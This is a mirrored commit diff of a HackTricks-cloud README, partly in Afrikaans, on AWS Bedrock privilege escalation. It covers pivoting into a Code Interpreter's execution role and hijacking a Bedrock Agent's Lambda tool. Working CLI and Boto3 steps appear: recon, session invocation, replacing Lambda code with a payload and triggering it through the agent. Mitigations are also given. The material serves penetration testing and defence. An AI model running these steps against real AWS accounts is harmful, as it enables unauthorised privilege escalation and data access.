gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-04-28 12:03:08 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-cloud/aws-security/aws-privilege-escalat

Browse Source
This commit is contained in:
Translator
2026-04-21 08:21:03 +00:00
parent 4479cbf028
commit 7186dc4564
1 changed files with 97 additions and 28 deletions
Download Patch File Download Diff File Expand all files Collapse all files

125
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
View File

@@ -6,32 +6,32 @@
### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
AgentCore Code Interpreter is 'n bestuurde uitvoeringsomgewing. **Custom Code Interpreters** kan gekonfigureer word met 'n **`executionRoleArn`** wat “toestemmings verskaf vir die code interpreter om toegang tot AWS services te kry”.
AgentCore Code Interpreter is a managed execution environment. **Custom Code Interpreters** can be configured with an **`executionRoleArn`** that “provides permissions for the code interpreter to access AWS services”.
Indien 'n **lower-privileged IAM principal** 'n Code Interpreter-sessie kan **start + invoke** wat gekonfigureer is met 'n **more privileged execution role**, kan die oproeper effektief **pivot into the execution roles permissions** (lateral movement / privilege escalation, afhangende van die rol se omvang).
If a **lower-privileged IAM principal** can **start + invoke** a Code Interpreter session that is configured with a **more privileged execution role**, the caller can effectively **pivot into the execution roles permissions** (lateral movement / privilege escalation depending on role scope).
> [!NOTE]
> Dit is gewoonlik 'n **misconfiguration / excessive permissions**-kwessie (om wye toegangsregte aan die interpreter execution role te verleen en/of breë invoke-toegang te gee).
> AWS waarsku uitdruklik om privilege escalation te vermy deur te verseker dat execution roles **equal or fewer** privileges het as die identiteite wat toegelaat word om te invoke.
> This is typically a **misconfiguration / excessive permissions** issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access).
> AWS explicitly warns to avoid privilege escalation by ensuring execution roles have **equal or fewer** privileges than identities allowed to invoke.
#### Voorvereistes (algemene miskonfigurasie)
#### Preconditions (common misconfiguration)
- 'n **custom code interpreter** bestaan met 'n oor-privilegieerde **execution role** (bv.: toegang tot sensitiewe S3/Secrets/SSM of IAM-admin-agtige bevoegdhede).
- 'n gebruiker (developer/auditor/CI identity) het permissies om:
- start sessies: `bedrock-agentcore:StartCodeInterpreterSession`
- invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
- (Opsioneel) Die gebruiker kan ook interpreters skep: `bedrock-agentcore:CreateCodeInterpreter` (stel hulle in staat om 'n nuwe interpreter te skep wat gekonfigureer is met 'n execution role, afhangende van org guardrails).
- A **custom code interpreter** exists with an over-privileged **execution role** (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities).
- A user (developer/auditor/CI identity) has permissions to:
- start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
- invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
- (Optional) The user can also create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (laat hulle toe om 'n nuwe interpreter te skep wat met 'n execution role gekonfigureer is, afhangend van org guardrails).
#### Recon (identify custom interpreters and execution role usage)
#### Rekonnaissance (identifiseer custom interpreters en execution role usage)
Lys interpreters (control-plane) en ondersoek hul konfigurasie:
Lys interpreters (control-plane) en inspekteer hul konfigurasie:
```bash
aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
````
> Die create-code-interpreter command ondersteun `--execution-role-arn`, wat bepaal watter AWS-toestemmings die interpreter sal hê.
```
> Die create-code-interpreter command ondersteun `--execution-role-arn` wat definieer watter AWS permissions die interpreter sal hê.
#### Stap 1 - Begin 'n sessie (dit gee `sessionId` terug, nie 'n interaktiewe shell nie)
#### Stap 1 - Begin 'n session (dit gee 'n `sessionId` terug, nie 'n interaktiewe shell nie)
```bash
SESSION_ID=$(
aws bedrock-agentcore start-code-interpreter-session \
@@ -43,11 +43,11 @@ aws bedrock-agentcore start-code-interpreter-session \
echo "SessionId: $SESSION_ID"
```
#### Stap 2 - Roep kode-uitvoering aan (Boto3 of signed HTTPS)
#### Stap 2 - Invoke code execution (Boto3 of getekende HTTPS)
Daar is **geen interaktiewe python shell** vanaf `start-code-interpreter-session`. Uitvoering gebeur via **InvokeCodeInterpreter**.
Daar is **geen interaktiewe python shell** vanaf `start-code-interpreter-session`. Execution gebeur via **InvokeCodeInterpreter**.
**Opsie A - Boto3 voorbeeld (voer Python uit + verifieer identiteit):**
**Opsie A - Boto3 voorbeeld (execute Python + verify identity):**
```python
import boto3
@@ -68,9 +68,9 @@ arguments={
for event in resp.get("stream", []):
print(event)
```
As die interpreter gekonfigureer is met 'n execution role, behoort die `sts:GetCallerIdentity()` uitset daardie rol se identiteit te weerspieël (nie die low-priv caller nie), wat die pivot aandui.
As die interpreter gekonfigureer is met n execution role, moet die `sts:GetCallerIdentity()`-uitset daardie role se identiteit weerspieël (nie die lae-priv caller nie), wat die pivot demonstreer.
**Opsie B - Ondertekende HTTPS-oproep (awscurl):**
**Opsie B - Signed HTTPS call (awscurl):**
```bash
awscurl -X POST \
"https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
@@ -89,18 +89,86 @@ awscurl -X POST \
```
#### Impak
* **Lateral movement** na watter AWS-toegang die interpreter execution role ook al het.
* **Privilege escalation** indien die interpreter execution role meer voorregte het as die caller.
* Moeilikere opsporing indien CloudTrail data events vir interpreter invocations nie geaktiveer is nie (invocations mag nie standaard gelog word nie, afhangend van die konfigurasie).
* **Laterale beweging** na enige AWS-toegang wat die interpreter execution role het.
* **Privilege escalation** as die interpreter execution role meer geprivilege is as die caller.
* Moeiliker opsporing as CloudTrail data events vir interpreter invocations nie geaktiveer is nie (invocations mag dalk nie by verstek gelog word nie, afhangende van konfigurasie).
#### Versagtingsmaatreëls / Hardening
#### Mitigations / Hardening
* **Least privilege** op die interpreter `executionRoleArn` (behandel dit soos Lambda execution roles / CI roles).
* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) en wie sessies kan begin.
* Gebruik **SCPs** om InvokeCodeInterpreter te weier behalwe vir goedgekeurde agent runtime roles (org-level enforcement kan nodig wees).
* Skakel toepaslike **CloudTrail data events** vir AgentCore in waar van toepassing; waarsku op onverwagte invocations en sessie-creation.
* **Beperk wie kan invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) en wie sessions kan begin.
* Gebruik **SCPs** om InvokeCodeInterpreter te deny behalwe vir goedgekeurde agent runtime roles (org-level enforcement kan nodig wees).
* Aktiveer toepaslike **CloudTrail data events** vir AgentCore waar van toepassing; alert op onverwachte invocations en session creation.
## References
## Amazon Bedrock Agents
### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
Bedrock Agents kan **Lambda-backed action groups** as tools gebruik (external execution). As 'n principal die **code van 'n Lambda function wat deur 'n agent gebruik word, kan modify**, en dan die **agent kan invoke**, kan hulle attacker-controlled code uitvoer onder die **Lambda execution role**.
> [!NOTE]
> Dit is 'n **cross-service trust abuse** (Bedrock → Lambda), nie 'n vulnerability nie. Die attacker mag dalk nie die Lambda direk kan invoke nie, maar kan dit steeds via die agent trigger.
#### Preconditions (common misconfiguration)
- 'n Bedrock Agent bestaan met 'n **action group backed by a Lambda function**
- Die attacker het:
- `lambda:UpdateFunctionCode`
- `bedrock:InvokeAgent`
- Die Lambda execution role het breër permissions as die attacker
- Die attacker kan die Lambda identifiseer wat deur die agent gebruik word
#### Recon
Inventory agent action groups:
```bash
aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
```
Inspekteer Lambda:
```bash
aws lambda get-function --function-name <FUNCTION_NAME>
```
#### Exploitation
Vervang Lambda-kode:
```bash
zip payload.zip lambda_function.py
aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip
```
Voorbeeld payload:
```python
import boto3
def lambda_handler(event, context):
return boto3.client("sts").get_caller_identity()
```
Trigger via agent:
```bash
aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"
```
#### Impak
* **Privilege escalation** na Lambda execution role
* **Data exfiltration** vanaf AWS services
* **Cross-service abuse** via trusted agent execution
#### Mitigasies
* **Restrict** `lambda:UpdateFunctionCode`
* Gebruik **least-privilege** Lambda roles
* **Monitor** Lambda code changes
* **Audit** Bedrock agent tool usage
## Verwysings
- [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/)
- [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/)
@@ -108,6 +176,7 @@ awscurl -X POST \
- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
{{#include ../../../../banners/hacktricks-training.md}}